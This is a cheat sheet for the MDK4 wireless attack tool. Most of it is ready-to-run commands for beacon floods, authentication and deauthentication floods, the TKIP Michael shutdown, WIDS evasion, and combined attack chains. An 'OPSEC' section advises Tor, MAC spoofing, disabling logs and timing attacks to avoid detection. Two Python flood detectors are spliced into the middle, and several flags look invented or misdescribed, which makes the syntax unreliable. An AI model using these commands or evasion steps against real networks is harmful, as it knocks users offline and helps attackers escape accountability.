MDK4
Installation
# Install dependencies (Ubuntu/Debian)
sudo apt-get install build-essential libpcap-dev aircrack-ng
# Clone and compile MDK4
git clone https://github.com/aircrack-ng/mdk4.git
cd mdk4
make
sudo make install
# Verify installation
mdk4 --version
Monitor Mode Setup
# Check wireless interfaces
iwconfig
ip link show
# Enable monitor mode on wlan0
sudo airmon-ng start wlan0
# Or manually with iw (creates wlan0mon)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Verify monitor mode active
iwconfig
# Output should show "Mode:Monitor"
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# Or manually revert
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
Basic Usage
# Help and version info
mdk4 --help
mdk4 --version
# List available attack modes
mdk4 wlan0mon --help
# General syntax
mdk4 <interface> <attack_mode> [options] <target>
Attack Modes
Beacon Flood (b)
Flood network with fake beacons, creating ghost networks and confusing clients.
# Basic beacon flood on all channels
mdk4 wlan0mon b
# Beacon flood with custom SSID file
mdk4 wlan0mon b -f ssid_list.txt
# Flood specific channel
mdk4 wlan0mon b -c 6
# Flood multiple channels
mdk4 wlan0mon b -c 1,6,11
# Set beacon interval (milliseconds)
mdk4 wlan0mon b -i 100
# Specify output interface (if multiple)
mdk4 wlan0mon b -B wlan0mon
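From the monitoring side, a beacon flood shows up as a burst of BSSIDs that were never seen before. The Python below is an added example (not part of the original cheat sheet and not MDK4 code) that flags such a burst against a baseline of known APs; the function name, thresholds and sample beacons are assumptions constructed for illustration.

```python
from collections import deque

def detect_beacon_flood(beacons, known_bssids=(), window=10.0, max_new=20):
    """beacons: (timestamp, bssid, ssid) tuples in time order.

    Returns (timestamp, new_bssid_count) each time the number of BSSIDs first
    seen inside the sliding window rises above max_new."""
    seen = {b.lower() for b in known_bssids}   # baseline from a site survey
    first_seen = deque()                        # first-sighting times in window
    alerts, alarmed = [], False
    for ts, bssid, _ssid in beacons:
        bssid = bssid.lower()
        if bssid not in seen:
            seen.add(bssid)
            first_seen.append(ts)
        while first_seen and ts - first_seen[0] > window:
            first_seen.popleft()
        over = len(first_seen) > max_new
        if over and not alarmed:                # alert once per burst
            alerts.append((ts, len(first_seen)))
        alarmed = over
    return alerts

KNOWN = ["AA:BB:CC:DD:EE:FF", "AA:BB:CC:DD:EE:01"]
# Constructed sample: two known APs beaconing every 0.1 s for 20 s, one new AP
# appearing at t=3, and 200 one-off BSSIDs between t=12 and t=14.
SAMPLE = [(i * 0.1, KNOWN[i % 2], "corp") for i in range(200)]
SAMPLE.append((3.0, "aa:bb:cc:dd:ee:02", "guest"))
SAMPLE += [(12.0 + i * 0.01, f"02:00:00:00:{i >> 8:02x}:{i & 0xff:02x}", f"net{i}")
           for i in range(200)]
SAMPLE.sort()

if __name__ == "__main__":
    print(detect_beacon_flood(SAMPLE, KNOWN))
```

Seed `known_bssids` from a site survey so legitimate APs never count as new, and tune `window` and `max_new` to how often real APs appear at the site.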
Authentication DoS (a)
Flood target with authentication requests, exhausting AP resources.
# Basic authentication DoS
mdk4 wlan0mon a -t <target_BSSID>
# Auth DoS on specific channel
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -c 6
# Flood with custom auth rate (packets/sec)
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -n 100
# Target multiple APs
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66
SSID Probing (p)
Broadcast probe requests for networks in a wordlist, testing for hidden SSIDs.
# Probe with SSID list
mdk4 wlan0mon p -f wordlist.txt
# Probe specific SSID
mdk4 wlan0mon p -s "MyNetwork"
# Probe on single channel
mdk4 wlan0mon p -f wordlist.txt -c 6
# Specify probe interval (milliseconds)
mdk4 wlan0mon p -f wordlist.txt -i 50
Deauthentication/Disassociation (d)
Force clients to disconnect from target AP.
# Deauth all clients on target AP
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF
# Deauth specific client
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Deauth with custom frame count
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 -n 100
# Deauth on specific channel
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -C 6
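The authentication and deauthentication/disassociation floods described above are visible in a monitor-mode capture as bursts of management frames for one BSSID. The Python below is an added example (not part of the original cheat sheet and not MDK4 code) that parses the 802.11 management header and flags such bursts; the function names, thresholds and sample frames are assumptions, and radiotap headers are assumed to be already stripped.

```python
import struct
from collections import defaultdict, deque

SUBTYPES = {10: "disassoc", 11: "auth", 12: "deauth"}

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame):
    """Return (kind, da, sa, bssid, reason) for auth/deauth/disassoc, else None."""
    if len(frame) < 24:                      # shorter than a management header
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype not in SUBTYPES:
        return None
    reason = None
    if subtype in (10, 12) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]   # little-endian reason code
    return SUBTYPES[subtype], mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(frames, window=1.0, threshold=10):
    """frames: (timestamp, raw_bytes) in time order. Returns sorted (kind, bssid) alerts."""
    recent, alerts = defaultdict(deque), set()
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        key = (parsed[0], parsed[3])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:            # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            alerts.add(key)
    return sorted(alerts)

def build(subtype, da, sa, bssid, body=b""):
    """Constructed test frame: 24-byte header plus body, no radiotap or FCS."""
    addrs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (da, sa, bssid))
    return bytes([subtype << 4, 0, 0, 0]) + addrs + b"\x00\x00" + body

AP, STA = "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"
# Constructed sample: one ordinary deauth, a 40-frame burst in 0.4 s, three auths.
SAMPLE = [(0.0, build(12, STA, AP, AP, b"\x03\x00"))]
SAMPLE += [(5.0 + i * 0.01, build(12, STA, AP, AP, b"\x07\x00")) for i in range(40)]
SAMPLE += [(6.0 + i, build(11, AP, STA, AP, bytes(6))) for i in range(3)]

if __name__ == "__main__":
    print(detect_floods(SAMPLE))
```

Rate alerts only show that a flood is happening; enabling 802.11w Protected Management Frames (mandatory in WPA3) is what lets clients discard unauthenticated deauthentication and disassociation frames.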
Michael Shutdown (m)
Trigger Michael frame errors to disable TKIP encryption and force downgrade.
# Basic Michael shutdown
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF
# Michael attack on specific client
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Set attack rate
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -n 100
EAPOL Start (e)
Send EAPOL Start frames to initiate authentication handshakes.
# Basic EAPOL Start flood
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF
# EAPOL with custom source MAC
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -s 00:11:22:33:44:55
# Set EAPOL interval
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -i 50
WIDS/IPS Evasion (w)
Exploit WIDS (Wireless Intrusion Detection) by sending fuzzy/malformed frames.
# WIDS confusion mode
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF
# Fuzzy frame generation
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF --fuzzy
# Target specific WIDS sensor
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF -c 6
Targeting and Filtering
# Target specific AP by BSSID
mdk4 wlan0mon b -t AA:BB:CC:DD:EE:FF
# Target specific client MAC
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Exclude specific BSSID
mdk4 wlan0mon b --bssid-file exclude.txt
# Target by SSID name (if known)
mdk4 wlan0mon d -s "TargetNetwork"
# Multiple targets
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66 -t 99:88:77:66:55:44
Channel Selection and Frequency
# Single channel
mdk4 wlan0mon b -c 6
# Multiple channels
mdk4 wlan0mon b -c 1,6,11,36,40,44,48
# All 2.4GHz channels
mdk4 wlan0mon b -c 1-13
# 5GHz UNII bands
mdk4 wlan0mon b -c 36-165
# No channel restriction (all bands)
mdk4 wlan0mon b
Rate Control and Timing
# Set frame rate (packets per second)
mdk4 wlan0mon b -n 1000
# Millisecond interval between frames
mdk4 wlan0mon b -i 10
# Slow rate for OPSEC
mdk4 wlan0mon b -n 50 -i 100
# Aggressive rate
mdk4 wlan0mon b -n 5000 -i 1
MAC Spoofing and Source Control
# Custom source MAC for beacons
mdk4 wlan0mon b -s 00:11:22:33:44:55
# Random MAC per frame
mdk4 wlan0mon b --random-mac
# Fixed BSSID in beacons
mdk4 wlan0mon b -B AA:BB:CC:DD:EE:FF
Advanced Options
# Verbose output
mdk4 wlan0mon b -v
# Show packet details
mdk4 wlan0mon b -d
# Duration/time limit (seconds)
timeout 300 mdk4 wlan0mon b
# Output to file for analysis
mdk4 wlan0mon b -o attack.log
# Background execution
mdk4 wlan0mon b &
OPSEC and Legal Considerations
Legal Warning
MDK4 performs DoS attacks against wireless networks. Only use on networks you own or have explicit written permission to test. Unauthorized use violates:
- Computer Fraud and Abuse Act (CFAA) in the US
- Computer Misuse Act in the UK
- Similar laws in most jurisdictions
Operational Security
# Use VPN/Tor if testing remote networks (never your home IP)
# Spoof MAC address to avoid tracking
sudo macchanger -r wlan0mon
# Use minimal output to reduce detection
mdk4 wlan0mon b -c 6 > /dev/null
# Disable logging of attacks
mdk4 wlan0mon b --nolog
# Time attacks during high traffic periods
# Launch during peak hours (less suspicious)
# Exit cleanly and restore interface
sudo airmon-ng stop wlan0mon
sudo systemctl restart networking
Detection Avoidance
- Vary attack parameters (channels, rates, timing)
- Avoid flooding from single source MAC
- Rotate attack modes to appear as multiple actors
- Do not target production networks during business hours
- Leave adequate gaps between attacks
- Monitor for WIDS alerts during testing
Combined Attack Scenarios
# Multi-channel beacon flood with custom SSIDs
mdk4 wlan0mon b -f wordlist.txt -c 1-13 -n 500
# Deauth + beacon flood (run in parallel)
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
mdk4 wlan0mon b -c 6 &
wait
# SSID enumeration + probe analysis
mdk4 wlan0mon p -f wordlist.txt -v
# Michael shutdown before deauth
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF &
sleep 5
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
wait
Troubleshooting
| Issue | Solution |
|---|---|
| "wlan0mon: No such device" | Run sudo airmon-ng start wlan0 to create monitor interface |
| Attacks fail silently | Check iwconfig for Monitor mode, verify channel, try -v flag |
| High CPU usage | Reduce rate (-n) or interval (-i) values |
| Packets not sending | Disable software encryption: sudo rfkill unblock all |
| Cannot target specific AP | Verify BSSID with sudo airodump-ng wlan0mon first |
| Connection to WIDS/IPS | Use fuzzy mode (w --fuzzy) or vary channels/rates |
Related Tools
- aircrack-ng — Full WiFi security suite (airodump, aireplay, airmon)
- hashcat — Password cracking for captured handshakes
- Wireshark — Packet analysis and inspection
- hcxdumptool — Extract hash-mode 22000 from PCAP for hashcat
- hostapd — Create rogue AP for evil twin attacks